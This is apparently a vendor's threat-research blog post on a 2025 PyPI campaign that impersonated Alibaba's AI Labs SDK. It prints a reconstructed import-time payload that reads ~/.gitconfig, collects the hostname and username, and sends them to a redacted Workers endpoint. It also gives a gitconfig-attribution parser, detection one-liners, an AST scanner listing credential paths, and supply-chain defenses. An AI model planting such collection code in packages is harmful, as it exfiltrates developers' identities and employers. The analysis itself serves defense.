Most PyPI malware campaigns are noisy: typosquats of requests, fake GPU libraries, generic infostealers that dump ~/.aws/credentials to a Heroku endpoint. The aliyun-ai-labs campaign is the opposite. Three packages — aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk, and aliyun-ai-labs-sdk — appeared on PyPI in mid-2025 with the precision of a targeted operation. Each one impersonates Alibaba's "AI Labs SDK", harvests just enough information to identify the victim's employer, and quietly removes itself. The campaign's targeting profile points squarely at Chinese-region developers working on commercial AI projects, and the lessons it carries about regional supply chain threats apply well outside of PyPI.
What did the packages do?
Each package shipped a single import-time payload in __init__.py. On install or first import, the code executed three steps in sequence: read ~/.gitconfig, resolve the machine's hostname, and POST the combined payload to a Cloudflare Workers endpoint controlled by the operator, which sees the victim's external IP from the connection itself. The .gitconfig is the high-signal piece: it typically contains a developer's full name and work email, and, where commit signing is configured, the GPG signing key ID (or, in S/MIME setups, a certificate whose subject can name the employer). With that data, the operator could correlate a hostname with a specific employee at a specific company, then decide whether to escalate to a second-stage payload.
# Reconstructed first-stage exfiltration (redacted)
import os, json, socket, urllib.request

def _collect():
    gitconfig = ""
    path = os.path.expanduser("~/.gitconfig")
    if os.path.exists(path):
        with open(path, "r") as f:
            gitconfig = f.read()
    payload = {
        "host": socket.gethostname(),
        "gitconfig": gitconfig,
        "user": os.environ.get("USER") or os.environ.get("USERNAME"),
    }
    req = urllib.request.Request(
        "https://<redacted>.workers.dev/collect",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req, timeout=3)

# Swallow every error so a failed beacon never breaks the import
try:
    _collect()
except Exception:
    pass
Why is .gitconfig such a high-value target?
In a corporate developer environment, .gitconfig is effectively a small attribution file. The [user] section carries name, email, and often a signingkey fingerprint that is verifiable against the company's keyserver or Active Directory smart-card system; corporate setups typically also set gpgsign = true in the [commit] section. [url "git@github.com:org-name/"] blocks reveal which GitHub organization the developer works against, and [includeIf "gitdir:~/work/"] clauses leak the on-disk layout that distinguishes work projects from personal ones. For an espionage operator with a list of target organizations, .gitconfig data takes them from "this is some Python developer" to "this is a contributor to org X's project Y" without ever touching the source tree.
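To make the attribution value concrete, here is a minimal stdlib-only sketch of the fields an operator could pull out of a harvested .gitconfig. The sample config, names, and organization are invented; git's config syntax is close enough to INI that configparser handles it for this purpose.

```python
# Illustrative only: extracting attribution fields from a .gitconfig-style
# text. The sample below is invented for demonstration.
import configparser

SAMPLE = """\
[user]
    name = Wei Zhang
    email = wei.zhang@example-corp.com
    signingkey = 3AA5C34371567BD2
[commit]
    gpgsign = true
[url "git@github.com:example-corp/"]
    insteadOf = https://github.com/example-corp/
"""

def attribution_fields(text: str) -> dict:
    cp = configparser.ConfigParser(strict=False)
    cp.read_string(text)
    return {
        "name": cp.get("user", "name", fallback=None),
        "email": cp.get("user", "email", fallback=None),
        "signingkey": cp.get("user", "signingkey", fallback=None),
        # [url "..."] section names leak which org's repos the developer uses
        "orgs": [s.split('"')[1] for s in cp.sections() if s.startswith("url ")],
    }

print(attribution_fields(SAMPLE))
```

Three dictionary lookups and a section scan turn an anonymous beacon into a named employee at a named company, which is exactly the escalation decision the first stage feeds.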
How did the targeting work?
The three packages used naming that would resonate specifically with developers in China: "Aliyun" is the pinyin romanization under which Alibaba Cloud markets itself domestically, and Alibaba's AI Labs is a recognizable research division. A developer searching for first-party Alibaba Python tooling in 2025 could plausibly encounter these names, especially via AI assistants that hallucinate Chinese-language package equivalents. ReversingLabs noted that the campaign was uploaded during business hours in UTC+8 (China Standard Time) and that the README files contained Simplified Chinese strings. Western package scanners missed the campaign for weeks because none of the names contain requests, urllib3, or other heavy-trigger substrings; PyPI download statistics show fewer than 3,500 cumulative installs before takedown.
What detection rules catch this pattern?
Three high-quality signals identify the regional-targeting pattern. First, any package whose __init__.py reads ~/.gitconfig is suspicious on its own: legitimate libraries have no reason to introspect a developer's git identity at import time. Second, a network call inside __init__.py to a Cloudflare Workers domain is a known operator habit; a *.workers.dev subdomain is free, deployable in seconds, and easy to rotate. Third, the combination of a non-English README and a name that mimics a major regional cloud provider (Aliyun, Yandex, Naver, Kakao) on a publisher's first-ever PyPI upload deserves human review.
# Static-detect import-time .gitconfig reads in a wheel
unzip -p package.whl '*.py' | grep -E '\.gitconfig' || echo "clean"
# Hunt installed copies of the known-bad packages
pip list 2>/dev/null | grep -E '^(aliyun-ai-labs-snippets-sdk|ai-labs-snippets-sdk|aliyun-ai-labs-sdk)\s'
# Confirm version, then uninstall
pip show aliyun-ai-labs-sdk 2>/dev/null && pip uninstall -y aliyun-ai-labs-sdk
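The shell one-liners catch literal string matches; a slightly stronger check walks the AST of a module's source and flags credential-path literals alongside network-capable imports. This is a heuristic sketch, not a production scanner, and the path and module lists are assumptions drawn from the patterns described above; expect false positives and treat hits as a review queue.

```python
# Heuristic sketch: flag the two signals the campaign combined --
# credential-style path literals plus network-capable imports -- in a
# module's source text. Not a complete scanner.
import ast

CREDENTIAL_PATHS = (".gitconfig", ".aws/credentials", ".netrc", ".docker/config.json")
NETWORK_ROOTS = {"urllib", "http", "socket", "requests", "httpx"}

def scan_module(source: str) -> list:
    findings = []
    for node in ast.walk(ast.parse(source)):
        # String constants mentioning credential-style paths
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(p in node.value for p in CREDENTIAL_PATHS):
                findings.append(f"credential path literal: {node.value!r}")
        # Imports whose top-level module can open a network connection
        elif isinstance(node, ast.Import):
            findings += [f"network import: {a.name}" for a in node.names
                         if a.name.split(".")[0] in NETWORK_ROOTS]
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_ROOTS:
                findings.append(f"network import: {node.module}")
    return findings

# Both signals together in one __init__.py is the aliyun pattern
demo = 'import urllib.request\npath = "~/.gitconfig"\n'
for hit in scan_module(demo):
    print(hit)
```

Either finding alone is weak evidence; the combination in an __init__.py that runs at import time is the signature worth alerting on.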
How does this connect to other 2025 PyPI campaigns?
The same operator profile — sparse install-time code, targeted regional naming, reconnaissance rather than full RAT — shows up in the May 2025 Solana-targeting wave (11 packages that exfiltrated .py source files from developer machines), the February 2025 DeepSeek impersonation packages (deepseekai, deepseeek — these dropped actual infostealers, a noisier sibling), and the long-running North Korean "Contagious Interview" campaign that has placed more than 338 npm and PyPI packages since July 2025. PyPI's Project Quarantine, introduced in August 2024 and expanded in 2025, removed two of the three aliyun packages within hours of community report; the third stayed live longer because the original maintainer email did not bounce and PyPI's policy still requires human review before deletion of an account-active project.
What organizational defenses actually work?
Pin every transitive dependency to a known-good version and require a security review before any new top-level dependency is added: the boring controls. Block PyPI installs in CI from any package with fewer than 50 maintainer-published versions or fewer than 1,000 cumulative downloads unless it is explicitly allowlisted. Point PIP_INDEX_URL at an internal proxy that mirrors only approved packages and rejects uploads younger than 14 days, a freshness rule that alone would have caught all three aliyun packages. And monitor outbound calls from developer workstations and CI runners to *.workers.dev; that single piece of network telemetry would have flagged this campaign on the first installation.
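The 14-day freshness rule reduces to a few lines of logic once you have a release's upload timestamp. PyPI's JSON API (https://pypi.org/pypi/<name>/json) exposes this per release file as upload_time_iso_8601; the network fetch is omitted here to keep the sketch self-contained, so the timestamp is passed in directly.

```python
# Sketch of a freshness gate: reject releases younger than a minimum age.
# The upload timestamp would come from PyPI's JSON API in practice.
from datetime import datetime, timedelta, timezone
from typing import Optional

MIN_AGE = timedelta(days=14)

def old_enough(upload_time_iso: str, now: Optional[datetime] = None) -> bool:
    uploaded = datetime.fromisoformat(upload_time_iso.replace("Z", "+00:00"))
    now = now or datetime.now(timezone.utc)
    return now - uploaded >= MIN_AGE

# A freshly uploaded package fails the gate until it has aged two weeks
check = datetime(2025, 6, 15, tzinfo=timezone.utc)
print(old_enough("2025-06-12T08:30:00Z", now=check))  # uploaded 3 days ago -> False
print(old_enough("2025-05-01T08:30:00Z", now=check))  # uploaded 6 weeks ago -> True
```

Wiring this into a proxy or a pre-install CI hook is the part that varies by organization; the gate itself is deliberately trivial so it never becomes the thing teams bypass.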
How Safeguard Helps
Safeguard's PyPI provider plugin scans __init__.py for filesystem reads of credential-style paths (.gitconfig, .aws/credentials, .netrc, .docker/config.json) and for outbound network calls at import time, the precise pattern the aliyun campaign used. The malicious-package feed carries the three known IOCs, and any newly uploaded package with a *.workers.dev or Heroku exfiltration endpoint is held in quarantine pending review. Policy gates enforce a minimum package age of 14 days for new top-level Python dependencies, which would have blocked every aliyun-ai-labs install in a Safeguard-protected pipeline. Griffin AI cross-references suspicious uploads against your developer geography to surface regionally targeted campaigns that western scanners miss, and TPRM workflows track regional registry mirror coverage so a Chinese-region team is not silently pulling from a less-audited mirror than your US-region team.